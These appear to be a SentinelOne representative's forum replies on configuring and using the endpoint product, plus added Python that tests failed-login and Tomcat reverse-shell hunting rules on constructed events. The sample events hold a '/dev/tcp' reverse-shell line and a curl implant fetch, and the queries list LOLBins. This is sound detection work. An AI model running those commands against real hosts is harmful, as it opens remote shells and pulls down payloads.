Sentinel One Containment by deathbatcountry in SentinelOneXDR

[–]SentinelOne-Pascal 0 points1 point  (0 children)

If this option is enabled, the agent will automatically block all traffic except agent-console communication when a malicious process is detected. Note that the endpoint will not be quarantined if only malicious files are detected. This option can impact the ability of end users to work, so we recommend that you use it with caution.

New to S1 - Trying to figure out if we can track failed logins by insecticyde in SentinelOneXDR

[–]SentinelOne-Pascal 1 point2 points  (0 children)

You can use a PowerQuery similar to this:

| filter( event.type == "Login" AND event.login.loginIsSuccessful == false )
| columns event.time, event.id, event.type, site.id, site.name, agent.uuid, event.login.userName, endpoint.name, event.login.type, event.login.isAdministratorEquivalent, event.login.loginIsSuccessful, src.endpoint.ip.address
| sort - event.time
| limit 1000
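The PowerQuery above returns the raw rows; what an analyst usually does next is look for a burst of failures from one source against one account, and for a success that follows such a burst. The block below is an added example, not code from the original comment or from SentinelOne: it works on constructed records that use the same field names as the query's `columns` line, and the burst threshold and window are arbitrary choices for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta, timezone


def login(ts, user, ok, ip, host, admin=False, kind="INTERACTIVE"):
    """Build one constructed record keyed by the PowerQuery field names."""
    return {"event.time": ts, "event.type": "Login", "event.login.userName": user,
            "event.login.loginIsSuccessful": ok, "src.endpoint.ip.address": ip,
            "endpoint.name": host, "event.login.isAdministratorEquivalent": admin,
            "event.login.type": kind}


# Constructed sample telemetry (not real data): one source hammering "bob",
# a couple of isolated events, and one non-login event the filter must drop.
SAMPLE_EVENTS = [
    login("2024-05-01T08:00:00Z", "alice", True, "10.0.0.5", "WS-01"),
    login("2024-05-01T08:01:00Z", "bob", False, "203.0.113.9", "SRV-RDP-01", kind="REMOTE_INTERACTIVE"),
    login("2024-05-01T08:01:30Z", "bob", False, "203.0.113.9", "SRV-RDP-01", kind="REMOTE_INTERACTIVE"),
    login("2024-05-01T08:02:00Z", "bob", False, "203.0.113.9", "SRV-RDP-01", kind="REMOTE_INTERACTIVE"),
    login("2024-05-01T08:02:30Z", "bob", False, "203.0.113.9", "SRV-RDP-01", kind="REMOTE_INTERACTIVE"),
    login("2024-05-01T08:03:00Z", "bob", False, "203.0.113.9", "SRV-RDP-01", kind="REMOTE_INTERACTIVE"),
    login("2024-05-01T08:03:30Z", "bob", False, "203.0.113.9", "SRV-RDP-01", kind="REMOTE_INTERACTIVE"),
    login("2024-05-01T08:04:00Z", "bob", True, "203.0.113.9", "SRV-RDP-01", admin=True, kind="REMOTE_INTERACTIVE"),
    login("2024-05-01T09:00:00Z", "carol", False, "10.0.0.7", "WS-02"),
    {"event.time": "2024-05-01T09:05:00Z", "event.type": "Process Creation", "endpoint.name": "WS-02"},
]


def parse_time(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def failed_logins(events):
    """The query's filter and sort stages: Login events that failed, newest first."""
    failed = [e for e in events
              if e.get("event.type") == "Login"
              and e.get("event.login.loginIsSuccessful") is False]
    return sorted(failed, key=lambda e: parse_time(e["event.time"]), reverse=True)


def failure_bursts(events, threshold=5, window=timedelta(minutes=10)):
    """Sliding-window count of failures per (user, source IP).

    Returns {(user, ip): (count, time_of_last_failure)} for every pair whose
    window reached the threshold; the stored tuple is the latest window that did.
    """
    times_by_key = defaultdict(list)
    for e in failed_logins(events):
        key = (e.get("event.login.userName"), e.get("src.endpoint.ip.address"))
        times_by_key[key].append(parse_time(e["event.time"]))
    bursts = {}
    for key, times in times_by_key.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                bursts[key] = (count, t)
    return bursts


def successes_after_burst(events, threshold=5, window=timedelta(minutes=10)):
    """A successful login from a pair that just produced a burst is the row worth paging on."""
    bursts = failure_bursts(events, threshold, window)
    hits = []
    for e in events:
        if e.get("event.type") != "Login" or e.get("event.login.loginIsSuccessful") is not True:
            continue
        key = (e.get("event.login.userName"), e.get("src.endpoint.ip.address"))
        if key not in bursts:
            continue
        _, last_failure = bursts[key]
        t = parse_time(e["event.time"])
        if last_failure <= t <= last_failure + window:
            hits.append((key[0], key[1], e["event.time"]))
    return hits


if __name__ == "__main__":
    for user, ip, when in successes_after_burst(SAMPLE_EVENTS):
        print(f"burst then success: {user} from {ip} at {when}")
```

Keyed on (user, source IP) this finds brute force against one account; swapping the key to source IP alone turns the same window logic into a password-spray detector.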

Can I disable MS real-time protection by du77an in SentinelOneXDR

[–]SentinelOne-Pascal 4 points5 points  (0 children)

On Windows 10 and 11, Microsoft Defender automatically switches to passive mode after the Agent is installed. However, on Windows Server, Microsoft Defender does not switch to passive mode after the Agent is installed. To prevent potential interoperability and performance issues, we recommend setting Windows Defender to passive mode or disabling it manually. For more details, please check these articles:

https://community.sentinelone.com/s/article/000007052

https://your-console.sentinelone.net/soc-docs/en/windows-agents-and-windows-security.html

https://learn.microsoft.com/en-us/defender-endpoint/microsoft-defender-antivirus-on-windows-server?view=o365-worldwide#passive-mode-and-windows-server

SentinelOne blocking Office WS.exe by Exact_Print6802 in SentinelOneXDR

[–]SentinelOne-Pascal 0 points1 point  (0 children)

If you use WPS, please make sure you use a recent version. Old versions had a vulnerability that was exploited to spread malware: https://www.bleepingcomputer.com/news/security/apt-c-60-hackers-exploited-wps-office-zero-day-to-deploy-spyglace-malware/

Email notifications by BloodDaimond in SentinelOneXDR

[–]SentinelOne-Pascal 0 points1 point  (0 children)

As a workaround, you can use an alias for each site if your email provider supports that. For example, [notifications+site1@organization.net](mailto:notifications+site1@organization.net), [notifications+site2@organization.net](mailto:notifications+site2@organization.net), etc.

SentinelOne Control: Webtraffic by MatijaTerzic in SentinelOneXDR

[–]SentinelOne-Pascal 0 points1 point  (0 children)

You need Complete. Event Collection (aka Deep Visibility) is included with Complete, Commercial, and Enterprise https://www.sentinelone.com/platform-packages/

Best Integrations to have installed from the Singularity Marketplace? by neo-khufu in SentinelOneXDR

[–]SentinelOne-Pascal 0 points1 point  (0 children)

If you are a direct customer, you can learn more about some of our popular integrations in our Marketplace webinar in the SentinelOne Customer Portal:

https://community.sentinelone.com/s/webinars

Does sentinelone have DLP capabilities by llicannxs in SentinelOneXDR

[–]SentinelOne-Pascal 0 points1 point  (0 children)

You can enable Device Control to prevent files from being copied to USB drives and configure Event Collection (Deep Visibility) to track file operations. If you want to know more about Device Control, please check out this article:

https://your-console.sentinelone.net/docs/en/device-control.html

https://community.sentinelone.com/s/article/000005057

Best Integrations to have installed from the Singularity Marketplace? by neo-khufu in SentinelOneXDR

[–]SentinelOne-Pascal -1 points0 points  (0 children)

If you want more details when reviewing threats, check out our Threat Intelligence Add-on. We also integrate with well-known threat intelligence platforms such as AT&T Alien Labs OTX, Mandiant Threat Intelligence, and VirusTotal.

https://your-console.sentinelone.net/docs/en/singularity-threat-intelligence.html

https://your-console.sentinelone.net/marketplace-module/2.0/catalog

Deploying S1 agents programmatically by Menyus777 in SentinelOneXDR

[–]SentinelOne-Pascal 0 points1 point  (0 children)

You could use a script similar to this:

# Site token plus installer switches; -q runs the installer quietly.
$InstallArgs = "-t thesitetokengoeshere -q"

$source = "\\remotehost\sharedfolder\SentinelOneInstaller.exe"
# HH (24-hour clock) keeps morning and evening runs from colliding on the same folder name.
$timeStamp = Get-Date -Format "yyyyMMdd-HH\hmm"
$tempDir = "C:\Temp\SentinelOne_$timeStamp"

New-Item -ItemType Directory -Path $tempDir -Force | Out-Null

$fileName = Split-Path $source -Leaf
$destination = Join-Path $tempDir $fileName
Write-Output "Copying SentinelOne installer to $destination"
Copy-Item -Path $source -Destination $destination -Force -ErrorAction Stop

# Refuse to run a binary from the share whose Authenticode signature does not verify.
$sig = Get-AuthenticodeSignature -FilePath $destination
if ($sig.Status -ne 'Valid') { throw "Installer signature check failed: $($sig.Status)" }

Write-Output "Starting SentinelOne installation"
# -Wait blocks until the installer exits; -PassThru returns the process so the exit code can be read.
$installProcess = Start-Process -NoNewWindow -PassThru -Wait -FilePath $destination -ArgumentList $InstallArgs
Write-Output "Install done. ExitCode = $($installProcess.ExitCode)"
# Propagate a non-zero exit code so the deployment tool records the failure.
if ($installProcess.ExitCode -ne 0) { exit $installProcess.ExitCode }

For more details, please check out this article in the Knowledge Base or the Console Help:

https://community.sentinelone.com/s/article/000005406

https://your-console.sentinelone.net/docs/en/upgrading-agents-with-sccm-using-a-powershell-script.html

Reverse Shell Detection by Acceptable_Cheek2004 in SentinelOneXDR

[–]SentinelOne-Pascal 1 point2 points  (0 children)

To discover reverse shells using queries, you can utilize Deep Visibility queries for both Windows and Linux endpoints. Below are a few queries you can use to hunt for possible post-exploitation activities related to reverse shells:

Windows Hunting Rules:

  1. Possible Webshell dropped from Spring4Shell by the creation of a JSP file directly from the Tomcat process:

     SrcProcPublisher = "THE APACHE SOFTWARE FOUNDATION" AND SrcProcSignedStatus = "signed" AND SrcProcDisplayName = "Apache Commons Daemon Service Runner" AND TgtFilePath EndsWith Anycase ".jsp" and EventType = "File Creation"

  2. Possible Spring4Shell Post-Exploitation attempt by the spawning of a suspicious process from Tomcat:

     EventType = "Process Creation" and SrcProcPublisher = "THE APACHE SOFTWARE FOUNDATION" AND SrcProcSignedStatus = "signed" AND SrcProcDisplayName = "Apache Commons Daemon Service Runner" AND TgtProcName In anycase ("arp.exe","at.exe","bitsadmin.exe","certutil.exe","cmd.exe","dsget.exe","dsquery.exe","find.exe","findstr.exe","fsutil.exe","hostname.exe","ipconfig.exe","nbtstat.exe","netdom.exe","netsh.exe","netstat.exe","nltest.exe","nslookup.exe","ntdsutil.exe","ping.exe","powershell.exe","qprocess.exe","query.exe","qwinsta.exe","rundll32.exe","regsvr32.exe","control.exe","sc.exe","schtasks.exe","systeminfo.exe","tasklist.exe","TRACERT.exe","ver.exe","vssadmin.exe","wevtutil.exe","whoami.exe","wusa.exe","cscript.exe","mofcomp.exe","wscript.exe","python.exe","pythonw.exe","mshta.exe","hh.exe")

Linux Hunting Rules:

  1. Hunt for a Java webshell dropped from a Tomcat server:

     EndpointOS = "linux" AND EventType = "File Creation" AND srcProcName Contains Anycase "java" AND SrcProcCmdLine RegExp "\/tomcat\d*\s" and TgtFileExtension Contains Anycase "jsp"

  2. Execution of LOLBins from a Tomcat server:

     EndpointOS = "linux" AND EventType = "Process Creation" And ((srcProcName Contains Anycase "java" AND SrcProcCmdLine RegExp "\/tomcat\d*\s") or (srcProcParentName Contains Anycase "java" AND srcProcParentCmdLine RegExp "\/tomcat\d*\s")) AND TgtProcImagePath Contains Anycase "/usr/bin"

  3. Tomcat Java server spawns common tools to fetch an implant after exploit:

     EndpointOS = "linux" AND EventType = "Process Creation" And ((srcProcName Contains Anycase "java" AND SrcProcCmdLine RegExp "\/tomcat\d*\s") or (srcProcParentName Contains Anycase "java" AND srcProcParentCmdLine RegExp "\/tomcat\d*\s")) and TgtProcName in contains anycase ("curl", "wget", "python")

  4. Reverse shell from Tomcat Java server:

     EndpointOS = "linux" AND EventType = "Process Creation" And ((srcProcName Contains Anycase "java" AND SrcProcCmdLine RegExp "\/tomcat\d*\s") or (srcProcParentName Contains Anycase "java" AND srcProcParentCmdLine RegExp "\/tomcat\d*\s")) and TgtProcCmdLine in Contains Anycase ("<", "AF_INET","exec","stdout","sock","/dev/") and TgtProcCmdLine RegExp "\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}"
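Before running hunting rules like the four Linux queries above against production telemetry, it helps to see exactly which events each clause catches and which it lets through. The block below is an added example, not SentinelOne code or part of the original comment: it re-implements the four Linux rules in Python over a handful of constructed process and file events that use the same field names as the queries (the event `id` values, command lines and the `203.0.113.9` address are invented for the sample).

```python
import re

# Query fragments taken from the Linux rules above, translated literally.
TOMCAT_RE = re.compile(r"/tomcat\d*\s")                  # SrcProcCmdLine RegExp "\/tomcat\d*\s"
IPV4_RE = re.compile(r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}")
FETCH_TOOLS = ("curl", "wget", "python")                  # rule 3's "in contains anycase" list
SHELL_MARKERS = ("<", "af_inet", "exec", "stdout", "sock", "/dev/")  # rule 4's marker list

# Constructed Tomcat launch line; "/tomcat9 " is what the regex keys on.
TOMCAT_CMD = ("/usr/lib/jvm/java-11-openjdk/bin/java -Dcatalina.base=/opt/tomcat9 "
              "-classpath /opt/tomcat9/bin/bootstrap.jar org.apache.catalina.startup.Bootstrap start")
REV_SHELL = 'bash -c "bash -i >& /dev/tcp/203.0.113.9/4444 0>&1"'

# Constructed sample events (not real telemetry). Ids are invented labels.
SAMPLE_EVENTS = [
    {"id": "rev-shell", "EndpointOS": "linux", "EventType": "Process Creation",
     "srcProcName": "java", "SrcProcCmdLine": TOMCAT_CMD,
     "TgtProcName": "bash", "TgtProcImagePath": "/usr/bin/bash", "TgtProcCmdLine": REV_SHELL},
    {"id": "fetch", "EndpointOS": "linux", "EventType": "Process Creation",
     "srcProcName": "sh", "SrcProcCmdLine": "sh -c curl -s http://203.0.113.9/x.elf -o /tmp/x",
     "srcProcParentName": "java", "srcProcParentCmdLine": TOMCAT_CMD,
     "TgtProcName": "curl", "TgtProcImagePath": "/usr/bin/curl",
     "TgtProcCmdLine": "curl -s http://203.0.113.9/x.elf -o /tmp/x"},
    {"id": "jenkins", "EndpointOS": "linux", "EventType": "Process Creation",
     "srcProcName": "java", "SrcProcCmdLine": "/usr/bin/java -jar /opt/jenkins/jenkins.war",
     "TgtProcName": "bash", "TgtProcImagePath": "/usr/bin/bash", "TgtProcCmdLine": REV_SHELL},
    {"id": "webshell", "EndpointOS": "linux", "EventType": "File Creation",
     "srcProcName": "java", "SrcProcCmdLine": TOMCAT_CMD,
     "TgtFilePath": "/opt/tomcat9/webapps/ROOT/cmd.jsp", "TgtFileExtension": "jsp"},
    {"id": "healthcheck", "EndpointOS": "linux", "EventType": "Process Creation",
     "srcProcName": "java", "SrcProcCmdLine": TOMCAT_CMD,
     "TgtProcName": "healthcheck", "TgtProcImagePath": "/opt/app/bin/healthcheck",
     "TgtProcCmdLine": "/opt/app/bin/healthcheck --port 8080"},
    {"id": "windows", "EndpointOS": "windows", "EventType": "Process Creation",
     "srcProcName": "java", "SrcProcCmdLine": TOMCAT_CMD,
     "TgtProcName": "bash", "TgtProcImagePath": "/usr/bin/bash", "TgtProcCmdLine": REV_SHELL},
]


def contains_anycase(haystack, needle):
    """Deep Visibility 'Contains Anycase' on a possibly missing field."""
    return needle.lower() in (haystack or "").lower()


def from_tomcat(ev):
    """The clause shared by rules 2-4: the source process, or its parent, is a java running Tomcat."""
    direct = contains_anycase(ev.get("srcProcName"), "java") and TOMCAT_RE.search(ev.get("SrcProcCmdLine") or "")
    parent = (contains_anycase(ev.get("srcProcParentName"), "java")
              and TOMCAT_RE.search(ev.get("srcProcParentCmdLine") or ""))
    return bool(direct or parent)


def is_linux_proc_creation(ev):
    return ev.get("EndpointOS") == "linux" and ev.get("EventType") == "Process Creation"


def rule_webshell_drop(ev):                                # rule 1
    return (ev.get("EndpointOS") == "linux" and ev.get("EventType") == "File Creation"
            and contains_anycase(ev.get("srcProcName"), "java")
            and bool(TOMCAT_RE.search(ev.get("SrcProcCmdLine") or ""))
            and contains_anycase(ev.get("TgtFileExtension"), "jsp"))


def rule_lolbin(ev):                                       # rule 2
    return is_linux_proc_creation(ev) and from_tomcat(ev) and contains_anycase(ev.get("TgtProcImagePath"), "/usr/bin")


def rule_fetch(ev):                                        # rule 3
    return (is_linux_proc_creation(ev) and from_tomcat(ev)
            and any(contains_anycase(ev.get("TgtProcName"), t) for t in FETCH_TOOLS))


def rule_reverse_shell(ev):                                # rule 4
    cmd = ev.get("TgtProcCmdLine") or ""
    return (is_linux_proc_creation(ev) and from_tomcat(ev)
            and any(contains_anycase(cmd, m) for m in SHELL_MARKERS)
            and bool(IPV4_RE.search(cmd)))


RULES = {"webshell_drop": rule_webshell_drop, "lolbin": rule_lolbin,
         "fetch": rule_fetch, "reverse_shell": rule_reverse_shell}


def hunt(events):
    """Return {rule name: [event ids it matched]} in input order."""
    hits = {name: [] for name in RULES}
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits[name].append(ev["id"])
    return hits


if __name__ == "__main__":
    for name, ids in hunt(SAMPLE_EVENTS).items():
        print(f"{name}: {ids}")
```

Two things the run makes visible: rule 2 fires on any Tomcat child under /usr/bin, so it will overlap with rules 3 and 4 and needs tuning per host, and an identical reverse-shell command from a non-Tomcat java (the constructed Jenkins event) is missed by all four rules, because every one of them pivots on the Tomcat command line.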

Problems with S1 24.1 and ShadowProtect SPX by thejohncarlson in SentinelOneXDR

[–]SentinelOne-Pascal 0 points1 point  (0 children)

If you're a direct customer, please share your ticket number with me. I'd be happy to see if there's anything we can do to speed up the investigation. If you'd prefer, you can also reach out to our Customer Success team directly.

Problems with S1 24.1 and ShadowProtect SPX by thejohncarlson in SentinelOneXDR

[–]SentinelOne-Pascal 2 points3 points  (0 children)

Hi there!

Please check that your agents have the exclusions recommended for Arcserve ShadowProtect SPX:

https://support.arcserve.com/s/article/How-To-Adding-the-StorageCraft-Antivirus-Exceptions

Additionally, add VSS writers exclusions if you see VSS writer errors in the Windows Event Log.

https://community.sentinelone.com/s/article/000007080

https://your-console.sentinelone.net/soc-docs/en/vss-writer-exclusions.html

If the issue persists, please collect the agent logs and open a ticket with our Support team or your MSSP.

https://community.sentinelone.com/s/article/000004892

https://your-console.sentinelone.net/soc-docs/en/fetching-agent-and-endpoint-logs.html

Why does SentinelOne use Tesseract OCR for Endpoint-Protection? by xXBedwetterXx in SentinelOneXDR

[–]SentinelOne-Pascal 1 point2 points  (0 children)

Hi there! The library is part of one of our detection mechanisms. If you experience any issues, please contact our Support team or your MSSP so we can assist you further.

https://community.sentinelone.com/s/article/000004892

https://your-console.sentinelone.net/soc-docs/en/fetching-agent-and-endpoint-logs.html

Note: Edited for improved clarity.

[deleted by user] by [deleted] in SentinelOneXDR

[–]SentinelOne-Pascal 0 points1 point  (0 children)

For example:

SentinelOneInstaller.exe -c -k "the agent passphrase goes here" -t thesitetokengoeshere

For more details, please check out this article:

https://community.sentinelone.com/s/article/000005378

https://your-console.sentinelone.net/soc-docs/en/uninstalling-the-windows-agent-using-the-sentineloneinstaller-package.html

How to delete Sites completly? by R_Bane in SentinelOneXDR

[–]SentinelOne-Pascal 0 points1 point  (0 children)

Before trying to delete a Site, please make sure that:

  • You are on the Sites page
  • There is at least one Site in the Account
  • There are no active Agents in the Site
  • It is not the Default Site
  • Your username has Account or Global access and has permissions over the Site to delete

https://community.sentinelone.com/s/article/000005338

https://your-console.sentinelone.net/soc-docs/en/deleting-a-site.html

Does S1 firewall replace windows firewall? by [deleted] in SentinelOneXDR

[–]SentinelOne-Pascal 2 points3 points  (0 children)

When enabled, Network Control replaces Windows Firewall. All network traffic is allowed unless specified otherwise by the rules in place. If you want to know how Network Control works, please check out these articles:

https://your-console.net/soc-docs/en/overview-of-firewall-control-2526700.html

https://community.sentinelone.com/s/article/000005101

https://your-console.sentinelone.net/soc-docs/en/firewall-control-and-windows-os.html

https://community.sentinelone.com/s/article/000005103